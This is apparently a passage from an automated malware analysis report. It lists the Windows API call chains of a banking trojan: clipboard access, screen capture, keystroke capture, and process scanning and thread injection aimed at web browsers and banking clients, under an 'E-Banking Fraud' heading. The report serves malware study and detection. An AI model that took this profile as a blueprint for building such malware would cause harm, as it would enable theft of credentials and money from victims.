    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CA3220 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02C99530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F69530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_02559530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025C9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CB54A0 PathAddBackslashA,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CA2F40 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii

    E-Banking Fraud

    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CA78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
andleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe1_2_02CA6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleH
andleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe1_2_02CA6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleH
andleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe1_2_02CA6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetCommandLineA,StrStrIA,memset,IsUserAnAdmin,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe1_2_02CA1900
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02C93610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_02F778A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe5_2_02F76CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe5_2_02F71900
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_02F63610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_025678A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_02566CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_02566CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,St
rStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_02566CA0
